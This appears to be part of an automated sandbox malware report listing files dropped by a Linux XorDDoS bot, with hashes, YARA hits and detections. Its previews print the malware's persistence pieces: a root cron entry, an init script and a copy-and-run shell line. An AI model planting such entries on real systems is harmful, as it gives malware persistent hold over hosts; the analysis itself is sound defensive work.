                                                            Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                            Process:/bin/dash
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):41
                                                            Entropy (8bit):3.8484226636198593
                                                            Encrypted:false
                                                            SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                            MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                            SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                            SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                            SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview:*/3 * * * * root /etc/cron.hourly/gcc.sh.
                                                            Process:/usr/lib/insserv/insserv
                                                            File Type:ASCII text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):1380
                                                            Entropy (8bit):4.6286085863457025
                                                            Encrypted:false
                                                            SSDEEP:24:KcR684NIwOkJVARL9Eg3U3PX2xRmbUtOeAyh1ZFDSYpY3dOUwZlY:VR6843OkjARLq0U3PX2xYwtOQh1vDTp8
                                                            MD5:5B62F52693F19BAD0D1373AB955F17B8
                                                            SHA1:3865ED303BD83951D0D69D87A6290F120A937C2E
                                                            SHA-256:9026F82085CF03BE408767439E4FD595F266FE6F11ECC4A3AF7F0555ED358196
                                                            SHA-512:E0015AA580EAAFFF64D59F666FDC91280AAC50C10D5189A13B376E3C9DC71A0FE019D7EE05351F1136F65F5F1CAE6C58D781CBA2E073D57E323629BF5137BE25
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview:TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh.INTERACTIVE = console-setup udev keyboard-setup cryptdisks cryptdisks-early checkroot.sh checkfs.sh.udev: mountkernfs.sh.keyboard-setup: mountkernfs.sh udev.mountdevsubfs.sh: mountkernfs.sh udev.brltty: mountkernfs.sh udev.procps: mountkernfs.sh udev.qemu-kvm: mountkernfs.sh udev.cryptdisks: checkroot.sh cryptdisks-early udev lvm2.cryptdisks-early: checkroot.sh udev.hwclock.sh: mountdevsubfs.sh.open-iscsi: networking iscsid.networking: resolvconf mountkernfs.sh urandom procps.iscsid: networking.checkroot.sh: hwclock.sh mountdevsubfs.sh hostname.sh keyboard-setup.lvm2: cryptdi
                                                            Process:/usr/lib/insserv/insserv
                                                            File Type:ASCII text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):1699
                                                            Entropy (8bit):4.570338756950413
                                                            Encrypted:false
                                                            SSDEEP:48:ZupBfNySAzo1kWY27ZGme/9/n2UPBL+/9/n2UPBLo/9/n2UPBL8h/9/n2UPBLM:gxWo1427keUPYeUPGeUPOeUP6
                                                            MD5:026A5D367A6DD0B13565C2143825C91E
                                                            SHA1:BE8CF98A85484FFB9C071CBD2BDCFADF746040A6
                                                            SHA-256:958D704A53DC3488623A197912973D6C40F7E6FE5FBB509ED2DF228F593743D5
                                                            SHA-512:573B79EBF6CF5926C58FB439B3917D6907A1020BA1737C3D50285D7F3C78559EAC4FFBB9D5E0463E28D83F6E9380C7861A6A3073572BF52F41EEC576DEC8A605
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:TARGETS = rsyslog unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs dkuidbsedp killprocs binfmt-support apport mdadm dbus speech-dispatcher hddtemp kerneloops irqbalance single whoopsie rsync ssh acpid lightdm bluetooth avahi-daemon cups-browsed saned plymouth grub-common ondemand rc.local.INTERACTIVE =.mdadm: rsyslog.dbus: rsyslog.speech-dispatcher: rsyslog.hddtemp: rsyslog.kerneloops: rsyslog.irqbalance: rsyslog.single: killprocs dkuidbsedp.whoopsie: rsyslog.rsync: rsyslog.ssh: rsyslog.acpid: rsyslog.lightdm: dbus acpid.bluetooth: rsyslog dbus.avahi-daemon: dbus rsyslog.cups-browsed: rsyslog.saned: rsyslog dbus.plymouth: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uuidd dbus speech-dispatcher lxd hddtemp kerneloops lightdm bluetooth irqbalance lvm2-lvmpolld avahi-daemon lxcfs dkuidbsedp saned whoopsie rsync ssh acpid binfmt-support apport.grub-common: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uui
                                                            Process:/usr/lib/insserv/insserv
                                                            File Type:ASCII text, with very long lines
                                                            Category:dropped
                                                            Size (bytes):1690
                                                            Entropy (8bit):4.52194295219339
                                                            Encrypted:false
                                                            SSDEEP:48:3Yu8rBj1G4GJ/suwT2UKGhuw2zOsuwK2UPOiNQh/4uwHFn2U5wT:M1iUJeZU1cU0
                                                            MD5:7897338A208ABF2E5C95E7994A24F8C8
                                                            SHA1:185E660978A050BD66B62C6AF44695251A373390
                                                            SHA-256:7143B8292EB1C2476411ECA94A4A67E5A166C9FB916724B3458247D1C0E1F5CB
                                                            SHA-512:F322DB116C7DE93E68D9709B8E2CE8163BC1E0BEB264D5D178815DB839FFB3E88AF4C17B4095BFB60A579B103CE48D67B1A257CA3394FCFD46FDA97A473C2632
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:TARGETS = atd network-manager cups anacron cron unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs mdadm resolvconf speech-dispatcher hddtemp alsa-utils kerneloops irqbalance ufw whoopsie lightdm bluetooth cups-browsed saned plymouth open-iscsi urandom avahi-daemon iscsid sendsigs rsyslog umountnfs.sh hwclock.sh networking umountfs cryptdisks cryptdisks-early umountroot mdadm-waitidle halt reboot.avahi-daemon: cups-browsed saned.iscsid: open-iscsi.sendsigs: atd mdadm open-iscsi unattended-upgrades open-vm-tools cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp iscsid alsa-utils kerneloops lightdm bluetooth irqbalance avahi-daemon lxcfs.rsyslog: atd mdadm sendsigs cups-browsed network-manager speech-dispatcher hddtemp kerneloops bluetooth irqbalance avahi-daemon cups saned whoopsie.umountnfs.sh: atd unattended-upgrades open-vm-tools rsyslog cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp sendsigs alsa-utils kern
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:POSIX shell script, ASCII text executable
                                                            Category:dropped
                                                            Size (bytes):315
                                                            Entropy (8bit):5.141446654602005
                                                            Encrypted:false
                                                            SSDEEP:6:hUtoFdU97cvR8sKheJ6iWcvwBE21YJvmNeMwhNWcvR61DzRIEOucv/h6Mz3OucvG:61cz6iWc4BEMO1NWcazunucnhz+ucnu
                                                            MD5:7A817B22D50158CA8AE6A95BFCEA4CB2
                                                            SHA1:D4B69FDF8065821E78660C89007E7AC2FD63405F
                                                            SHA-256:4550E0BA3744D665E4D38A51D18A97DBDF586CADE3D8BCBBE99CFD99CEFA5407
                                                            SHA-512:E997F9AE31620D8FFC482B4F2B69B328D0827349DA12CA75FDE1AE6C6FDCDF69E3FDA787AA0206DFF4E8E4CD832406F39E301E8D78F1E74794090EBA4BD5E0BB
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: dkuidbsedp.### BEGIN INIT INFO.# Provides:..dkuidbsedp.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.dkuidbsedp.### END INIT INFO.case $1 in.start)../tmp/dkuidbsedp..;;.stop)..;;.*)../tmp/dkuidbsedp..;;.esac.
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625878
                                                            Entropy (8bit):6.244401838455305
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Am:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91b
                                                            MD5:37542894283B8851469753DE69C0BCDC
                                                            SHA1:0480F29F346B400B989D88798B4418D5EF0FD3D9
                                                            SHA-256:7C0D5161AD70ACF5B98B640089D23ADA44935DCD7240C64D43F7CC54D853ACB1
                                                            SHA-512:0CE2FCC97494EAB5FEEC72AB21163E1AC0C6AE9182F6D366DD7E5A2BCB00C1C46276EB4504FA09B79D258113881A2EBB5FE942642F88F738B68DE83D9DFFE71F
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /lib/libudev.so, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /lib/libudev.so, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /lib/libudev.so, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):32
                                                            Entropy (8bit):4.116729296672174
                                                            Encrypted:false
                                                            SSDEEP:3:wR9XWhd:D3
                                                            MD5:C6CF13C590675674064D4A7C0AB84FA1
                                                            SHA1:8CFE8700A85AEAA6DDABAC76A331F230F6F7CC23
                                                            SHA-256:C04DDB20EFDFC8F2EF83D32C536B4A82BE719478EAD67421594C704D86F76CE3
                                                            SHA-512:71DBE1DD3BC055CDD6792BFEC48D96A8157CB3CD4E9A8657CF1F126E58A574B974BEF6A69F5B3FBFE9BA6E498964045277C9CDA3938A5897AD5147273FF7C996
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:vcgktyioiaixliwssuhhjmnsuaneafuy
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244432979030593
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A5:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91K
                                                            MD5:A39F4DBBA50225792BC678E0AE044EF5
                                                            SHA1:0204D2021105C16CD3C155FF22C5B33AFA5C3404
                                                            SHA-256:13D0FDFF1F094DA4566B057388FE27611436CC9B702C68BDBC82311260A993D3
                                                            SHA-512:544E322185FBC14DD30F99953A9962B4A04F479115C23BD2CBD9C1BBB03881822E6A602510B9391F64C0E9DB4681B6D058E3FA9EA37E0CE8B2E72EF3E17CD826
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/kmavqzvhro, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/kmavqzvhro, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/kmavqzvhro, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244425260071684
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A/:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91c
                                                            MD5:446F97EE9842B394ED1A50FE59B5C7D8
                                                            SHA1:CDD7C5410862907D9880CF0D45B9919CB4F327FD
                                                            SHA-256:7F09A82BA1B5D00BFC90F411D72B126FC68D5D73103D30F4DE5F389F62D6C547
                                                            SHA-512:D166EE66CF390741E7509B2A04BF3288588C491BBC4029ED000C375E6A4340B25A512714A5BB8CB581137271B984A401C6B9E6A452A868F0B81EE7E85F350631
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qjfxtxsijs, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qjfxtxsijs, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qjfxtxsijs, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244432171893418
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Al:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/912
                                                            MD5:ADA71B4B71B57B78680A7D8EFD5C3382
                                                            SHA1:34270D2DCE6EDE8ADECFBED34C604BF702AC7079
                                                            SHA-256:D0E86CDF3D933D77FA2EF0B41695D9B56FE16B01E24EB6C92AD7C49C709B8CB4
                                                            SHA-512:B74F5922B763D90A0DDAEF7FFEECC558E830E4412B463495B0009698142202FC6A8CFD1A680F22F1E88A9403698793DB06E462B8EBD4119A586B21084C5A1827
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qvilroogsz, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qvilroogsz, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qvilroogsz, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244438941254228
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A3:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91A
                                                            MD5:E9F6680F4483FB8BC5FB7E9E55222BD7
                                                            SHA1:64E9235802CC52E0699E1058C6F89124C895B2FA
                                                            SHA-256:D15E0A037E8B898A6D3EF025A17E27E8A7E2315C8EB964CE84031A63EEFC17D1
                                                            SHA-512:1757862DF270B77F3F71BAF64EA75F43476D12977C0F8525C384A17F1E6F0EE7C20D038ADF376AA809113E47FE01CE2C610EBD50A1EAA70011ECBC352B65E551
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tudlcvpgbc, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tudlcvpgbc, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tudlcvpgbc, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.24444078994817
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91h
                                                            MD5:75E59FA1A4720187F898957348FDA126
                                                            SHA1:545040C76ADC4F6CF4C0441D4B9F13343697152C
                                                            SHA-256:5F8ADD858E1ECCD64CC16024EE2C2070CD801F5CDEC3E08B2E6E1C3E9C9C8E2C
                                                            SHA-512:7E21E5CFAC69075898DEF937BA62E2FC3AF52D1D55C7529884724DDFDA3B058E821AD9E071662281A173D0C46017CB2485A8EF7C208ECDF3971BAFC73FF46887
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/txflbjqefg, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/txflbjqefg, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/txflbjqefg, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244444901105289
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A5:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91a
                                                            MD5:A23FDDCEEEC8B0B1803AFA96B34F57DE
                                                            SHA1:2FF2BEE4B6C2427C0DA39E973F9E07A816798655
                                                            SHA-256:735BBBE4FF7FE6133ADA43A8D48F38623C20555CBC10D1B4DDD22E7845365005
                                                            SHA-512:BF7240780E83CAD3DB88C2E2674CDF8C91B6A751553A2358CDE135BBAF8688C64471F05AAB0D22C489EEFBF2CE80548583CF9BFF6AE19F603B344B676E10F212
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wgpgdetjwe, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wgpgdetjwe, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wgpgdetjwe, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244433121826029
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AX:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91A
                                                            MD5:3FA295FF1F014FB5DD96C4434909EC39
                                                            SHA1:5F0F098548DD794FBAC3B8894F09F8BF4505AFAF
                                                            SHA-256:F9B05CDFD4B9B4E36CC28CECF759B582F8F8C3AC6715F9453BEB882ED04EB81A
                                                            SHA-512:483FB40613A89E25B77DEB77367551B15F47689480C6601D81BBB64BE1AB24C46CFE61334AD252F5F1B42EAB7DED941FE33BA71E49CA5C36CD1C3B7370B78F5C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/whtzopaggc, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/whtzopaggc, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/whtzopaggc, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                            Process:/tmp/dkuidbsedp
                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                            Category:dropped
                                                            Size (bytes):625889
                                                            Entropy (8bit):6.244435319940656
                                                            Encrypted:false
                                                            SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Aa:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91p
                                                            MD5:2CC8AEFFC8AF7ADDF44CB78168298206
                                                            SHA1:F2D048E97A2C3C0DC4EA68A875F63263B91166B9
                                                            SHA-256:1E7E7AD5F3F9A06B9735A97EC438FE9923D456DF5C4E526CAFCE8287D8D2E7B7
                                                            SHA-512:F5157BF62D762A8AA0E9EBF16A5240DA041D47A9B1EB336C1845DEA0727DAF6ECBC96DB6F0ECADF2F648C075B729778AE28D4E98A398B6E2EFD0F251D907BA26
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wrfeamwlub, Author: Joe Security
                                                            • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wrfeamwlub, Author: ditekSHen
                                                            • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wrfeamwlub, Author: Akamai CSIRT
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
